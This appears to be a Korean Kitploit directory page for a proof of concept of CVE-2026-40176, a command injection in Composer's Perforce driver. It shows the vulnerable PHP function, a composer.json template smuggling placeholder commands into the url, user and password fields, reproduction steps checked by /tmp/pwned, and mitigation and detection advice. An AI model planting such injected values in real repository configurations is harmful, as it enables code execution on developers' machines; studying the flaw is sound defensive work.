Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/dapthehuman/cve-2026-40176-cve-2026-40261
Vulnerability AnalysisExploitationWeb Application ExploitationCommand and ControlPayload Development
GitHubdapthehuman/cve-2026-40176-cve-2026-40261

cve-2026-40176-cve-2026-40261

개념 증명(PoC)으로, Composer의 Perforce 드라이버에서 명령 주입(CVE-2026-40176)을 시연하며, 조작된 저장소 구성을 통해 원격 코드 실행을 가능하게 합니다.

저장소 보기
4개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-40176

Composer Perforce 저장소 원격 코드 실행 (RCE)

Composer Version Severity Type


📋 요약

Composer의 Perforce 저장소 드라이버에서 저장소 URL 처리 시 입력 검증 부족으로 인해 원격 코드 실행(RCE)을 허용하는 명령 주입 취약점


🎯 취약점 세부 정보

속성값
CVE IDCVE-2026-40176
영향을 받는 버전Composer < 2.2.27
취약점 유형명령 주입
공격 벡터악성 저장소 구성
영향임의 코드 실행
CVSS 점수높음/치명적

🔍 기술 설명

이 취약점은 Composer가 perforce 유형을 처리하는 방식에 존재합니다. 해당 매개변수는 셸 명령에 전달되기 전에 제대로 삭제(샌티타이즈)되지 않아, 공격자가 임의의 시스템 명령을 주입할 수 있습니다.

root@kitploit:~

    public function generateP4Command($command, $useClient = true)
    {
        $p4Command = 'p4 ';
        $p4Command .= '-u ' . $this->getUser() . ' ';
        if ($useClient) 
            $p4Command .= '-c ' . $this->getClient() . ' ';
        }
        $p4Command .= '-p ' . $this->getPort() . ' ' . $command;

        return $p4Command;
    }

이 모든 것이 제대로 이스케이프되지 않아, 공격자는 perforce 유형의 모든 필드에 악성 페이로드를 구성하여 명령을 주입할 수 있습니다.

취약한 코드 패턴:

root@kitploit:~
{
  "repositories": [
    {
      "type": "perforce",
      "url": "PERFORCE_URL; INJECTED_COMMAND #",
      "depot": "depot",
      "p4user": "user; INJECRTED_COMMAND #",
      "p4password": "password; INJECTED_COMMAND #",
    }
  ]
}

🚀 개념 증명

이 저장소에는 취약점을 입증하는 작동하는 개념 증명이 포함되어 있습니다.

프로젝트 구조

root@kitploit:~
CVE-2026-40176/
├── composer.json              # 악성 Perforce 저장소 구성
├── vuln-composer.phar         # Composer 2.2.26 (취약한 버전)
├── patched-composer.phar      # Composer 2.2.27 (패치된 버전)
└── README.md                  # 이 파일

재현 단계

1. 저장소 클론

root@kitploit:~
git clone <repository-url>
cd CVE-2026-40176

2. Composer 버전 확인

root@kitploit:~
php vuln-composer.phar --version
# 출력: Composer version 2.2.26

php patched-composer.phar --version
# 출력: Composer version 2.2.27

3. 취약한 버전 테스트

root@kitploit:~
php vuln-composer.phar install
# 또는
php vuln-composer.phar update

4. 악용 확인

root@kitploit:~
ls -la /tmp/pwned

5. 패치된 버전 테스트 (실패해야 함)

root@kitploit:~
rm -f /tmp/pwned
php patched-composer.phar update
ls -la /tmp/pwned
# 파일이 존재하지 않아야 함 (취약점이 패치됨)

🛡️ 완화 조치

즉시 조치

  1. Composer 업그레이드 - 버전 2.2.27 이상으로:

    root@kitploit:~
    composer self-update --2.2.27
    # 또는
    wget https://getcomposer.org/download/2.2.27/composer.phar
    
  2. 모든 composer.json 파일 검토 - 알 수 없거나 의심스러운 저장소 구성 확인

  3. 공급망 감사 - 신뢰할 수 없는 저장소를 참조하는 종속성이 있는지 확인

탐지

root@kitploit:~
# Composer 버전 확인
composer --version

# 프로젝트에서 Perforce 저장소 검색
grep -r "perforce" */composer.json
도구 다운로드